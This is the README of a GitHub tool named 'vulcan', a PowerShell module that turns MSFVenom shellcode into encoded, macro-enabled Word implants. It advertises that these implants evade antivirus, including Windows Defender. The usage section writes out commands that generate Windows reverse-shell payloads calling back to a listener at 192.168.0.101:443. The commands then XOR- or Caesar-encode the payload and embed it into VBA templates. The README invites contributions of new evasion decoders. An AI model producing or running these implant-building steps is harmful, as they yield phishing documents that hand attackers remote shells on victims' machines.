A PowerShell script to automate the creation of consitent and efficient macro-enabled Word documents. At the time of writing, the indirect template yields great results at evading most AVs, including Windows Defender in some cases.
This PowerShell script can be viewed as kind of a third-party add-on to MSFVenom - made possible thanks to Windows Subsystem for Linux - that leverage templates to quickly and easily - encoded - create Word implants.
Users/stargazers are greatly encouraged toward contributing to improving and extending this project. 🐺
- Decoding routines/functions (
.\assets\decoders) -> do not hesitate to submit new templates. - Piping of shellcodes allowing for complex transformations in order to evade AVs.
Visual Basictemplating (.\assets\templates) -> do not hesitate to submit new templates.- Work-around
Visual Basicline-continuation limitations using-Treshold.
- Windows Subsystem for Linux with MSFVenom installed.
-
Clone this repository:
git clone https://github.com/aress31/vulcan cd vulcan
-
Load the
PowerShellscripts:Import-Module -Name .\Vulcan.psm1
-
(Optional) List available commands:
Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
-
Run
vulcan:wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=threadis a placeholder in the above example... 🙄
Get-Help -Name Invoke-Vulcan is your friend... Your best friend is Get-Help -Name Invoke-Vulcan -Detailed. Nonetheless, Invoke-Vulcan must be fed a hex-formatted shellcode. This can be achieved with:
Get-Content -Path $ShellCode | Invoke-Vulcan ...wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...-
Embed a
plainshellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
-
Embed a
Caesar-encoded shellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Caesar -Key 5 | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
-
Embed a
XOR-encoded shellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-XOR -Key "StarWatchThisRepo" | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
pwsh.in.vulcan.2022-07-31.04-20-56.mp4
[!WARNING] The length of the key must be shorted than the shellcode.
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=threadis a placeholder in the above examples... 🙄
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪
It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. 😁
Found a bug 🐛? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? 🤩
Please submit all PRs on the GitHub pull requests tracker.
Give to Caesar (no pun intended 🙄) what belongs to Caesar:
vulcan is distributed under the terms of the BSD 3.
See LICENSE for details.